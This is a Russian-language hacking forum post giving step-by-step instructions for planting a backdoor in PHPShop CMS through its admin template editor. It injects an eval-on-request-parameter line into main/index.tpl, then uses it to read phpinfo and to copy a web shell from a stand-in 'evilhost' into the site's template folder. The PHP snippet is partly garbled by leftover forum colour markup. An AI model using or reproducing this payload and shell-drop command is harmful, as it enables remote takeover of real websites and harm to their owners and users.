Показать сообщение отдельно

  #13  
Старый 16.03.2013, 02:31
Take_IT
Guest
Сообщений: n/a
Провел на форуме:
97570

Репутация: 267
По умолчанию

PHPShop & PHPShop CMS Free - Latest Version


Developers - phpshop.ru , cms.phpshopcms.ru

Need: Admin Access

Admin url: /phpshop/admpanel/

Заходим в редактор .tpl шаблонов. Выбираем тему с шаблоном которой будем работать, можно выбрать текущую тему, например "gray"

Выбираем файл шаблона, например файл шаблона для главной страницы "main/index.tpl"

Внедряем свой код

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]php

[/COLOR][COLOR="#007700"]eval([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]@[/COLOR][/COLOR
Смотрим абсолютный путь:

Код:
Code:
localhost/?e=phpinfo();
Льем шелл:

Код:
Code:
localhost/?e=copy("evilhost/shell.txt","/home/yoursite/phpshop/templates/gray/main/shell.php");
 
Ответить с цитированием